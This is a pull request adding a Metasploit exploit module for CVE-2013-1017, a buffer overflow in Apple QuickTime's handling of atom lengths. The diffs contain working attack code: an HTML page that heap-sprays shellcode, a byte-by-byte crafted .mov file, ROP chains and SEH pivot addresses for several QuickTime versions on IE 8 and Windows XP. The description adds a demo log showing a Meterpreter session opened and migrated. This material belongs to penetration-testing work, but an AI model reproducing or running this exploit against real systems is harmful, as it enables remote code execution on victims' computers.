### PR TITLE
Add CVE-2013-1017: Apple Quicktime Invalid Atom Length BoF

### DIFF
--- a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
@@ -1,0 +1,236 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::RopDb
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Apple Quicktime Invalid Atom Length Buffer Overflow",
+			'Description'    => %q{
+				This module exploits a vulnerability found in Apple Quicktime. The flaw is
+				triggered when Quicktime fails to properly handle the data length for certain
+				atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer
+				overflow by loading a specially crafted .mov file, and allows arbitrary
+				code execution under the context of the user.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'pyoor',         # Original Discovery & PoC (overlapped finding)
+					'Tom Gallagher', # Original Discovery (overlapped)
+					'Paul Bates',    # Original Discovery (overlapped)
+					'sinn3r'         # Metasploit
+				],
+			'References'     =>
+				[
+					[ 'CVE', '2013-1017' ],
+					[ 'BID', '60097' ],
+					[ 'URL', 'http://support.apple.com/kb/HT5770' ]
+				],
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					# Tested Quicktime versions:
+					# 7.7.3 (1680.64)
+					[ 'Automatic', {} ],
+					[ 'IE 8 on Windows XP SP3', { 'Rop' => true } ]  # msvcrt (7.0.2600.5512)
+				],
+			'Payload'        =>
+				{
+					'BadChars'        => "\x00",  # js_property_spray no like nilz
+					'StackAdjustment' => -3500
+				},
+			'DefaultOptions'  =>
+				{
+					'InitialAutoRunScript' => 'migrate -f'
+				},
+			'Privileged'     => false,
+			'DisclosureDate' => "May 22 2013",
+			'DefaultTarget'  => 0))
+	end
+
+
+	def get_target(agent)
+		return target if target.name != 'Automatic'
+
+		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
+		ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
+
+		ie_name = "IE #{ie}"
+
+		case nt
+		when '5.1'
+			os_name = 'Windows XP SP3'
+		end
+
+		targets.each do |t|
+			if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
+				return t
+			end
+		end
+
+		nil
+	end
+
+
+	def get_payload(t)
+		p    = ''
+
+		rop =
+		[
+			0x77c1e844, # POP EBP # RETN [msvcrt.dll]
+			0x77c1e844, # skip 4 bytes [msvcrt.dll]
+			0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
+			0xffffffff,
+			0x77c127e5, # INC EBX # RETN [msvcrt.dll]
+			0x77c127e5, # INC EBX # RETN [msvcrt.dll]
+			0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
+			0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
+			0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
+			0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
+			0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
+			0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
+			0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
+			0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
+			0x77c3048a, # POP EDI # RETN [msvcrt.dll]
+			0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
+			0x77c46efb, # POP ESI # RETN [msvcrt.dll]
+			0x77c2aacc, # JMP [EAX] [msvcrt.dll]
+			0x77c3b860, # POP EAX # RETN [msvcrt.dll]
+			0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
+			0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
+			0x77c35459  # ptr to 'push esp #  ret ' [msvcrt.dll]
+		].pack("V*")
+
+		p << rop
+		p << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+		p << payload.encoded
+
+		p
+	end
+
+
+	def get_html(t)
+		js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
+		fake_mov_name = rand_text_alpha(4) + ".mov"
+		html = %Q|
+		<html>
+		<head>
+		<script>
+		#{js_property_spray}
+
+		var s = unescape("#{js_p}");
+		sprayHeap({shellcode:s});
+		</script>
+		</head>
+		<body>
+		<embed src="#{get_resource}/#{fake_mov_name}" width="0" height="0"></embed>
+		</body>
+		</html>
+		|
+
+		html.gsub(/^\t\t/, '')
+	end
+
+
+	def on_request_uri(cli, request)
+		agent = request.headers['User-Agent']
+		print_status("Requesting: #{request.uri}")
+
+		target = get_target(agent)
+
+		# contype: a mov file request from Apple Quicktime
+		if target.nil? and agent != 'contype'
+			print_error("Browser not supported, sending 404: #{agent}")
+			send_not_found(cli)
+			return
+		end
+
+		print_status("Target selected as: #{target.name}") if target
+
+		if request.uri =~ /\.mov$/
+			print_status("Sending specially crafted .mov file")
+			send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })
+		else
+			html = get_html(target)
+			send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
+		end
+	end
+
+	def sort_bytes(data)
+		data.map { |e| [e].pack('N').scan(/../).reverse.join }.join
+	end
+
+	def rop_nop
+		[0x6692346d].pack('V*')                  # Ret (QuickTime.qts)
+	end
+
+	def exploit
+		buf = ''
+		buf << rand_text_alpha(467)              # 467 to algin the pivot
+		10.times {
+			buf << rop_nop
+		}
+		buf << [
+			0x66849239,                          # POP ESP; RET (QuickTime.qts)
+			0x20302020                           # Target value for ESP (our ROP payload)
+		].pack('V*')
+		buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler
+		buf << sort_bytes([0x66923467])          # ADD ESP,280; RET (QuickTime.qts) - pivot
+		buf << rand_text_alpha(658 - buf.length) # 658 bytes to padd up the mov file size
+
+		# Quicktime File Format Specifications:
+		# https://developer.apple.com/standards/qtff-2001.pdf
+		mov  = "\x00\x00\x06\xDF"                # File size
+		mov << "moov"                            # Movie atom
+		mov << "\x00\x00\x06\xD7"                # size (1751d)
+		mov << "rmra"                            # Reference Movie atom
+		mov << "\x00\x00\x06\xCF"                # size (1743d)
+		mov << "rmda"                            # rmda atom
+		mov << "\x00\x00\x06\xBF"                # size (1727d)
+		mov << "rdrf"                            # Data reference atom
+		mov << "\x00\x00\x00\x00"                # size set to 0
+		mov << "alis"                            # Data reference type: FS alias record
+		mov << "\x00\x00\x06\xAA"                # Size (1706d)
+		mov << rand_text_alpha(8)
+		mov << "\x00\x00\x06\x61"                # Size (1633d)
+		mov << rand_text_alpha(38)
+		mov << "\x12"
+		mov << rand_text_alpha(81)
+		mov << "\xFF\xFF"
+		mov << rand_text_alpha(18)
+		mov << "\x00\x08"                        # Size (8d)
+		mov << rand_text_alpha(8)
+		mov << "\x00\x00"
+		mov << "\x00\x08"                        # Size (8d)
+		mov << rand_text_alpha(8)
+		mov << "\x00\x00"
+		mov << "\x00\x26"                        # Size (38d)
+		mov << rand_text_alpha(38)
+		mov << "\x00\x0F\x00\x0E"
+		mov << "AA"                              # Size (must be invalid)
+		mov << rand_text_alpha(12)
+		mov << "\x00\x12\x00\x21"
+		mov << rand_text_alpha(36)
+		mov << "\x00"
+		mov << "\x0F\x33"
+		mov << rand_text_alpha(17)
+		mov << "\x02\xF4"                        # Size (756h)
+		mov << rand_text_alpha(756)
+		mov << "\xFF\xFF\x00\x00\x00"
+		mov << buf
+
+		@exploit = mov
+		super
+	end
+end

--- a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
@@ -11,11 +11,10 @@ class Metasploit4 < Msf::Exploit::Remote
 	Rank = NormalRanking
 
 	include Msf::Exploit::Remote::HttpServer::HTML
-	include Msf::Exploit::RopDb
 
 	def initialize(info={})
 		super(update_info(info,
-			'Name'           => "Apple Quicktime Invalid Atom Length Buffer Overflow",
+			'Name'           => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
 			'Description'    => %q{
 				This module exploits a vulnerability found in Apple Quicktime. The flaw is
 				triggered when Quicktime fails to properly handle the data length for certain
@@ -40,10 +39,12 @@ class Metasploit4 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					# Tested Quicktime versions:
-					# 7.7.3 (1680.64)
-					[ 'Automatic', {} ],
-					[ 'IE 8 on Windows XP SP3', { 'Rop' => true } ]  # msvcrt (7.0.2600.5512)
+					# All of the following addresses are from Quicktime.qts
+					# RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET
+					[ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', {'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239} ],
+					[ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', {'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55} ],
+					[ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', {'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259} ],
+					[ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', {'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A} ]
 				],
 			'Payload'        =>
 				{
@@ -55,33 +56,9 @@ class Metasploit4 < Msf::Exploit::Remote
 					'InitialAutoRunScript' => 'migrate -f'
 				},
 			'Privileged'     => false,
-			'DisclosureDate' => "May 22 2013",
-			'DefaultTarget'  => 0))
+			'DisclosureDate' => "May 22 2013"
+		))
 	end
-
-
-	def get_target(agent)
-		return target if target.name != 'Automatic'
-
-		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
-		ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
-
-		ie_name = "IE #{ie}"
-
-		case nt
-		when '5.1'
-			os_name = 'Windows XP SP3'
-		end
-
-		targets.each do |t|
-			if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
-				return t
-			end
-		end
-
-		nil
-	end
-
 
 	def get_payload(t)
 		p    = ''
@@ -120,6 +97,18 @@ class Metasploit4 < Msf::Exploit::Remote
 	end
 
 
+	def targetable?(agent)
+		if agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 5\.1/
+			return true
+		elsif agent =~ /contype/
+			# contype: a mov file request from Apple Quicktime
+			return true
+		end
+
+		false
+	end
+
+
 	def get_html(t)
 		js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
 		fake_mov_name = rand_text_alpha(4) + ".mov"
@@ -147,10 +136,8 @@ class Metasploit4 < Msf::Exploit::Remote
 		agent = request.headers['User-Agent']
 		print_status("Requesting: #{request.uri}")
 
-		target = get_target(agent)
-
-		# contype: a mov file request from Apple Quicktime
-		if target.nil? and agent != 'contype'
+		
+		unless targetable?(agent)
 			print_error("Browser not supported, sending 404: #{agent}")
 			send_not_found(cli)
 			return
@@ -171,22 +158,22 @@ class Metasploit4 < Msf::Exploit::Remote
 		data.map { |e| [e].pack('N').scan(/../).reverse.join }.join
 	end
 
-	def rop_nop
-		[0x6692346d].pack('V*')                  # Ret (QuickTime.qts)
+	def rop_nop(t)
+		[t['Nop']].pack('V*')                    # Ret (QuickTime.qts)
 	end
 
 	def exploit
 		buf = ''
 		buf << rand_text_alpha(467)              # 467 to algin the pivot
 		10.times {
-			buf << rop_nop
+			buf << rop_nop(target)
 		}
 		buf << [
-			0x66849239,                          # POP ESP; RET (QuickTime.qts)
+			target['Pop'],                       # POP ESP; RET (QuickTime.qts)
 			0x20302020                           # Target value for ESP (our ROP payload)
 		].pack('V*')
 		buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler
-		buf << sort_bytes([0x66923467])          # ADD ESP,280; RET (QuickTime.qts) - pivot
+		buf << sort_bytes([target.ret])          # ADD ESP,280; RET (QuickTime.qts) - pivot
 		buf << rand_text_alpha(658 - buf.length) # 658 bytes to padd up the mov file size
 
 		# Quicktime File Format Specifications:

--- a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
@@ -164,7 +164,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
 	def exploit
 		buf = ''
-		buf << rand_text_alpha(467)              # 467 to algin the pivot
+		buf << rand_text_alpha(467)              # 467 to align the pivot
 		10.times {
 			buf << rop_nop(target)
 		}
@@ -174,7 +174,7 @@ class Metasploit4 < Msf::Exploit::Remote
 		].pack('V*')
 		buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler
 		buf << sort_bytes([target.ret])          # ADD ESP,280; RET (QuickTime.qts) - pivot
-		buf << rand_text_alpha(658 - buf.length) # 658 bytes to padd up the mov file size
+		buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size
 
 		# Quicktime File Format Specifications:
 		# https://developer.apple.com/standards/qtff-2001.pdf


### PR DESCRIPTION
This module exploits a vulnerability found in Apple Quicktime. The flaw is triggered when Quicktime fails to properly handle the data length for certain atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer overflow by loading a specially crafted .mov file, and allows arbitrary code execution under the context of the user.

Demo:

```
msf exploit(apple_quicktime_rdrf) > [*] 10.6.0.142       apple_quicktime_rdrf - Requesting: /SQptaJ7L8U9I
[*] 10.6.0.142       apple_quicktime_rdrf - Target selected as: IE 8 on Windows XP SP3
[*] 10.6.0.142       apple_quicktime_rdrf - Requesting: /SQptaJ7L8U9I/nKPJ.mov
[*] 10.6.0.142       apple_quicktime_rdrf - Sending specially crafted .mov file
[*] 10.6.0.142       apple_quicktime_rdrf - Requesting: /SQptaJ7L8U9I/nKPJ.mov
[*] 10.6.0.142       apple_quicktime_rdrf - Target selected as: IE 8 on Windows XP SP3
[*] 10.6.0.142       apple_quicktime_rdrf - Sending specially crafted .mov file
[*] Sending stage (751104 bytes) to 10.6.0.142
[*] Meterpreter session 1 opened (10.6.0.142:4444 -> 10.6.0.142:54197) at 2013-07-17 13:44:21 -0500
[*] Session ID 1 (10.6.0.142:4444 -> 10.6.0.142:54197) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2156)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2496
[+] Successfully migrated to process
```
